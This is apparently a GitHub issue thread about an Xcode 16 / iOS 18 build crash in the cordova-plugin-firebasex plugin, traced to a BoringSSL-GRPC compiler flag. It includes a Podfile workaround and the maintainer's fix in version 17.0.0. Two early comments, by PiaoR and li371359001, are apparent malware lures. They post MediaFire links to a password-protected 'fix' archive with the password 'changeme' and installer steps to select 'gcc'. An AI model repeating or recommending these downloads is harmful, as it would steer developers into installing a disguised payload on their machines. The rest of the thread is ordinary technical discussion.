### ISSUE TITLE
Xcode 16 & iOS 18 Build Crash

### ISSUE THREAD

**Issue by erisu** [dpa99c/cordova-plugin-firebasex#892] opened 2024-08-28 06:07 UTC
# Bug report

**CHECKLIST**
- [x] I have read the [issue reporting guidelines](https://github.com/dpa99c/cordova-plugin-firebasex#reporting-issues)

- [x] I confirm this is a suspected bug or issue that will affect other users

- [x] I have reproduced the issue using the [example project](https://github.com/dpa99c/cordova-plugin-firebasex-test) or provided the necessary information to reproduce the issue.

- [x] I have read [the documentation](https://github.com/dpa99c/cordova-plugin-firebasex) thoroughly and it does not help solve my issue.

- [x] I have checked that no similar issues (open or closed) already exist.

**Current behavior:**

When attempting to build a project using this plugin with Xcode 16 beta, the build will crash with the following error:

> /path/to/project/platforms/ios/Pods/BoringSSL-GRPC/src/ssl/tls_method.cc unsupported option '-G' for target 'arm64-apple-ios13.0-simulator'

 
This is a known issue which comes from a dependency that Firebase uses. This issue had been reported and fixed.

Firebase was also aware of the issue and updated their library which should have resolved this issue.

Below are the following tickets surrounding the issue.
 
- GRPC: https://github.com/grpc/grpc/issues/36888
- Firebase iOS: https://github.com/firebase/firebase-ios-sdk/issues/13115 
 
**Expected behavior:**

Build should be successful.

**Steps to reproduce:**

Add current plugin to any project and try to build with Xcode 16 beta

**Screenshots**

**Environment information**

- Cordova CLI version 
	- 12.0.0
- Cordova platform version
	- cordova-ios@7.1.0
- Plugins & versions installed in project (including this plugin)
    - cordova-plugin-firebasex@16.5.0
- Dev machine OS and version, e.g.
    - OSX
        - macOS 14.6.1 (23G93)
        
_Runtime issue_
- Device details
    - iPhone 15 Pro Max Simulator
- OS details
    - iOS 18.0 (22A5346a)

_iOS build issue:_
- Node JS version
    - v22.6.0
- XCode version
    - Xcode 16.0 - Build version 16A5230g 

**Other information:**

There is a SO post that talked about the issue and included a workaround solution when there was no fix: 

* https://stackoverflow.com/a/78633109

But looking at the Firebase library spec, I beleive the issue has been resolved in version 11.0.0. (Current version is 11.1.0)

The above linked issue tickets says:

> Fixed in 1.65.2 and 1.66.0-pre1 release

Looking at the podspec of `FirebaseFirestoreInternal@11.1.0` it says [gRPC-Core](https://cocoapods.org/pods/gRPC-Core) version is `~> 1.65.0`. I believe this will pull in the fixed version.

**Comment by PiaoR** [comment] 2024-08-28 06:11
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by li371359001** [comment] 2024-08-28 06:39
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by xavierserrai** [comment] 2024-09-02 09:04
Dears,

What I did is add the workaround on https://stackoverflow.com/a/78633109 into scripts/ios/helper.js into the applyPodsPostInstall function.

The new code added:

````
if target.name == 'BoringSSL-GRPC'
         target.source_build_phase.files.each do |file|
             if file.settings && file.settings['COMPILER_FLAGS']
                 flags = file.settings['COMPILER_FLAGS'].split
                 flags.reject! { |flag| flag == '-GCC_WARN_INHIBIT_ALL_WARNINGS' }
                 file.settings['COMPILER_FLAGS'] = flags.join(' ')
             end
         end
     end
````

The resulting function:

`````
    applyPodsPostInstall: function(pluginVariables, iosPlatform){
        var podFileModified = false,
            podFilePath = iosPlatform.podFile,
            podFile = fs.readFileSync(path.resolve(podFilePath)).toString(),
            DEBUG_INFORMATION_FORMAT = pluginVariables['IOS_STRIP_DEBUG'] && pluginVariables['IOS_STRIP_DEBUG'] === 'true' ? 'dwarf' : 'dwarf-with-dsym',
            IPHONEOS_DEPLOYMENT_TARGET = podFile.match(iosDeploymentTargetPodRegEx)[1];

        if(!podFile.match('post_install')){
            podFile += `
post_install do |installer|
    installer.pods_project.targets.each do |target|
        target.build_configurations.each do |config|
            config.build_settings['DEBUG_INFORMATION_FORMAT'] = '${DEBUG_INFORMATION_FORMAT}'
            config.build_settings['IPHONEOS_DEPLOYMENT_TARGET'] = '${IPHONEOS_DEPLOYMENT_TARGET}'
            if target.respond_to?(:product_type) and target.product_type == "com.apple.product-type.bundle"
                config.build_settings['CODE_SIGNING_ALLOWED'] = 'NO'
            end
        end
        if target.name == 'BoringSSL-GRPC'
            target.source_build_phase.files.each do |file|
                if file.settings && file.settings['COMPILER_FLAGS']
                    flags = file.settings['COMPILER_FLAGS'].split
                    flags.reject! { |flag| flag == '-GCC_WARN_INHIBIT_ALL_WARNINGS' }
                    file.settings['COMPILER_FLAGS'] = flags.join(' ')
                end
            end
        end
    end
end
                `;
            fs.writeFileSync(path.resolve(podFilePath), podFile);
            utilities.log('cordova-plugin-firebasex: Applied post install block to Podfile');
            podFileModified = true;
        }
        return podFileModified;
    },
`````

Hope it helps.

**Comment by franfrLor** [comment] 2024-09-19 08:10
> if target.name == 'BoringSSL-GRPC'
>             target.source_build_phase.files.each do |file|
>                 if file.settings && file.settings['COMPILER_FLAGS']
>                     flags = file.settings['COMPILER_FLAGS'].split
>                     flags.reject! { |flag| flag == '-GCC_WARN_INHIBIT_ALL_WARNINGS' }
>                     file.settings['COMPILER_FLAGS'] = flags.join(' ')
>                 end
>             end
>         end

How can we add this?
Do we need to make a new version of the firebasex plugin?
I tried to add the code directly in the Podfile on XCode but still build failed.

**Comment by garethedwards** [comment] 2024-09-19 08:35
> How can we add this? Do we need to make a new version of the firebasex plugin?
> I tried to add the code directly in the Podfile on XCode but still build failed.

Same here - tried adding it to the helper.js as @xavierserrai recommended and even directly to the Podfile, and neither worked for me.
The build output always shows that it's adding the offending flag, suggesting it's not taking any notice of the altered Podfile
Right now I can't build without removing the Firebase plugin

Any other suggestions greatly welcome

**Comment by franfrLor** [comment] 2024-09-19 10:04
> > How can we add this? Do we need to make a new version of the firebasex plugin?
> > I tried to add the code directly in the Podfile on XCode but still build failed.
> 
> Same here - tried adding it to the helper.js as @xavierserrai recommended and even directly to the Podfile, and neither worked for me. The build output always shows that it's adding the offending flag, suggesting it's not taking any notice of the altered Podfile Right now I can't build without removing the Firebase plugin
> 
> Any other suggestions greatly welcome

I just modified the sh file directly in vscode and it worked.

**Comment by garethedwards** [comment] 2024-09-19 10:27
> > > How can we add this? Do we need to make a new version of the firebasex plugin?
> > > I tried to add the code directly in the Podfile on XCode but still build failed.
> > 
> > 
> > Same here - tried adding it to the helper.js as @xavierserrai recommended and even directly to the Podfile, and neither worked for me. The build output always shows that it's adding the offending flag, suggesting it's not taking any notice of the altered Podfile Right now I can't build without removing the Firebase plugin
> > Any other suggestions greatly welcome
> 
> I just modified the sh file directly in vscode and it worked.

Sorry - which sh file was that?

**Comment by franfrLor** [comment] 2024-09-19 11:32
> scripts/ios/helper.js

src-cordova/plugins/cordova-plugin-firebasex/scripts/ios/helper.js

**Comment by yann-intuitisoft** [comment] 2024-09-19 12:39
thank you so much. Works for me. 
I have created the pull request https://github.com/dpa99c/cordova-plugin-firebasex/pull/893

**Comment by Rodedrengen** [comment] 2024-09-23 09:14
As far as I can see the problem occurs becuase of this issue, in BoringSSL-GRPC https://github.com/grpc/grpc/pull/36904. 
This is released in BoringSSL-GRPC 0.0.36. 

Cordova-plugin-firebasex 16.5.0, is adding a pod called FirebaseCore 10.24.0, which requires BoringSSL-GRPC 0.0.24, but the new version of FirebaseCore 11.2.0, should require the new 0.0.36. I think this would be the correct solution instead of this wired workaround.

**Comment by franfrLor** [comment] 2024-09-23 09:59
> As far as I can see the problem occurs becuase of this issue, in BoringSSL-GRPC [grpc/grpc#36904](https://github.com/grpc/grpc/pull/36904). This is released in BoringSSL-GRPC 0.0.36.
> 
> Cordova-plugin-firebasex 16.5.0, is adding a pod called FirebaseCore 10.24.0, which requires BoringSSL-GRPC 0.0.24, but the new version of FirebaseCore 11.2.0, should require the new 0.0.36. I think this would be the correct solution instead of this wired workaround.

Can you propose a PR with an increase in versions to correct the problem?

**Comment by mCassanoQuix** [comment] 2024-09-24 08:44
Hello, i would like to report that pinning a specific version does not work, as FirebaseInAppMessaging is only available as beta and pod installation fails as the spec cannot be found. Adding the beta tag lets the installation continue, but GoogleTagManager and GoogleSignIn version also need to be increased. After that pod installation completes, but the build step fails as i assume some methods have changed signatures and/or module.

**Comment by mmwlada** [comment] 2024-09-24 11:12
I can confirm this. 
I made changes in Podfile:

-  Firebase to 11.2.0
- GoogleSignIn to 7.0.0
- GoogleTagManager to 8.0.0.

After that there were some changes in code, 

- FirebasePlugin 
  Changed code in accordance with migration guide (See pictures)
- AppDelegate+FirebasePlugin 
  Added `#import "FirebaseAuth-Swift.h"`

After that, I was able to build the app, but my app doesn't use Google SignIn so I couldn't test that part.

https://developers.google.com/identity/sign-in/ios/quick-migration-guide
https://cocoapods.org/pods/GoogleSignIn#changelog
AppDelegate+FirebasePlugin Error
![image](https://github.com/user-attachments/assets/0b54052c-ced6-455d-85bc-893a5e441726)

FirebasePlugin Errors
![image](https://github.com/user-attachments/assets/e74cfac2-f7f7-4ef5-a377-74146c59b282)
![image](https://github.com/user-attachments/assets/e93b36bd-2937-475e-a48d-edd72356326f)

FirebasePlugin after fix
![image](https://github.com/user-attachments/assets/f9857992-ae64-4616-b157-3b35449e85bd)
![image](https://github.com/user-attachments/assets/ac36852f-6eb6-4eb8-af55-1984186834a0)

**Comment by dpa99c** [comment] 2024-09-25 11:28
This should now be fixed in v17.0.0 of the plugin which I've just released: 
it pins v11.2.0 of the Firebase iOS SDK, as well as GoogleSignIn v7.0.0 (plugin code has been updated for breaking API changes in this) and GoogleTagManager v8.0.0
Also added `IOS_FIREBASE_IN_APP_MESSAGING_VERSION` to enable setting that to a different version (i.e. `-beta`) than other iOS SDK component versions.
It's a new major plugin version as Firebase iOS SDK v11 drops support for iOS 12 which is a breaking change.

I've regression tested it using the [example project](https://github.com/dpa99c/cordova-plugin-firebasex-test) with XCode v16 / iOS v18 / macOS v15
Let me know if you still encounter any issues with this.

P.S. If you have pinned component versions in your `package.json` / `plugins/fetch.json`, don't forget to update or remove them.

**Comment by mmwlada** [comment] 2024-09-25 14:46
I've just tried it with new version.
Adding ios fails with this error:
`[!] CocoaPods could not find compatible versions for pod "FirebaseInAppMessaging":
 In Podfile:
  FirebaseInAppMessaging (= 11.2.0-beta)
Specs satisfying the `FirebaseInAppMessaging (= 11.2.0-beta)` dependency were found, but they required a higher minimum deployment target.`

This happens whatever version I put in `deployment-target` in config.xml.

**Comment by roman-rr** [comment] 2024-09-25 18:23
> I've just tried it with new version. Adding ios fails with this error: `[!] CocoaPods could not find compatible versions for pod "FirebaseInAppMessaging": In Podfile: FirebaseInAppMessaging (= 11.2.0-beta) Specs satisfying the `FirebaseInAppMessaging (= 11.2.0-beta)` dependency were found, but they required a higher minimum deployment target.`
> 
> This happens whatever version I put in `deployment-target` in config.xml.

Have you try to set deployment-target = 13 ?

**Comment by dpa99c** [comment] 2024-09-25 18:26
Check the deployment target in Podfile and Xcode: it needs to be `13.0` or above.

For comparison, here's the console log from a successful build of the example project using XCode 16, `cordova-ios@7`, `cordova-plugin-firebasex@17.0.0`:
https://pixeldrain.com/u/twZRspSh

**Comment by roman-rr** [comment] 2024-09-26 01:23
Thank you @dpa99c 
`17.0.0` works well for me, with such configuration:
```json
"IOS_FIREBASE_SDK_VERSION": "11.2.0",
"IOS_FIREBASE_IN_APP_MESSAGING_VERSION": "11.2.0-beta",
"IOS_GOOGLE_SIGIN_VERSION": "7.0.0",
"IOS_GOOGLE_TAG_MANAGER_VERSION": "8.0.0",
```

and config.xml
```xml
<platform name="ios">
        <preference name="deployment-target" value="13.0" />
</platform>
```

Build succeeds! 🎉

**Comment by dpa99c** [comment] 2024-09-26 07:08
> And for Android builds. Could you please check that build succeed at example project? Right now I got this:

Sorry, forgot to push the commit to the example project which sets API 34 as the build SDK: I've pushed it now so try pulling and rebuilding.

Android build Gradle 8.4 / `cordova-android@13`: [build.log](https://github.com/user-attachments/files/17144330/build.log)

**Comment by roman-rr** [comment] 2024-09-26 07:43
@dpa99c Thank you again. I think it's completely resolved.

**Comment by dpa99c** [comment] 2024-09-26 08:47
OK, closing as resolved but can be re-opened if necessary

**Closed by dpa99c** 2024-09-26 08:47 UTC

**Comment by grantsingleton** [comment] 2024-10-17 18:18
> Dears,
> 
> What I did is add the workaround on https://stackoverflow.com/a/78633109 into scripts/ios/helper.js into the applyPodsPostInstall function.
> 
> The new code added:
> 
> ```
> if target.name == 'BoringSSL-GRPC'
>          target.source_build_phase.files.each do |file|
>              if file.settings && file.settings['COMPILER_FLAGS']
>                  flags = file.settings['COMPILER_FLAGS'].split
>                  flags.reject! { |flag| flag == '-GCC_WARN_INHIBIT_ALL_WARNINGS' }
>                  file.settings['COMPILER_FLAGS'] = flags.join(' ')
>              end
>          end
>      end
> ```
> 
> The resulting function:
> 
> ```
>     applyPodsPostInstall: function(pluginVariables, iosPlatform){
>         var podFileModified = false,
>             podFilePath = iosPlatform.podFile,
>             podFile = fs.readFileSync(path.resolve(podFilePath)).toString(),
>             DEBUG_INFORMATION_FORMAT = pluginVariables['IOS_STRIP_DEBUG'] && pluginVariables['IOS_STRIP_DEBUG'] === 'true' ? 'dwarf' : 'dwarf-with-dsym',
>             IPHONEOS_DEPLOYMENT_TARGET = podFile.match(iosDeploymentTargetPodRegEx)[1];
> 
>         if(!podFile.match('post_install')){
>             podFile += `
> post_install do |installer|
>     installer.pods_project.targets.each do |target|
>         target.build_configurations.each do |config|
>             config.build_settings['DEBUG_INFORMATION_FORMAT'] = '${DEBUG_INFORMATION_FORMAT}'
>             config.build_settings['IPHONEOS_DEPLOYMENT_TARGET'] = '${IPHONEOS_DEPLOYMENT_TARGET}'
>             if target.respond_to?(:product_type) and target.product_type == "com.apple.product-type.bundle"
>                 config.build_settings['CODE_SIGNING_ALLOWED'] = 'NO'
>             end
>         end
>         if target.name == 'BoringSSL-GRPC'
>             target.source_build_phase.files.each do |file|
>                 if file.settings && file.settings['COMPILER_FLAGS']
>                     flags = file.settings['COMPILER_FLAGS'].split
>                     flags.reject! { |flag| flag == '-GCC_WARN_INHIBIT_ALL_WARNINGS' }
>                     file.settings['COMPILER_FLAGS'] = flags.join(' ')
>                 end
>             end
>         end
>     end
> end
>                 `;
>             fs.writeFileSync(path.resolve(podFilePath), podFile);
>             utilities.log('cordova-plugin-firebasex: Applied post install block to Podfile');
>             podFileModified = true;
>         }
>         return podFileModified;
>     },
> ```
> 
> Hope it helps.

If you're using this in bare react native, put this update in your Podfile. `native/ios/Podfile`
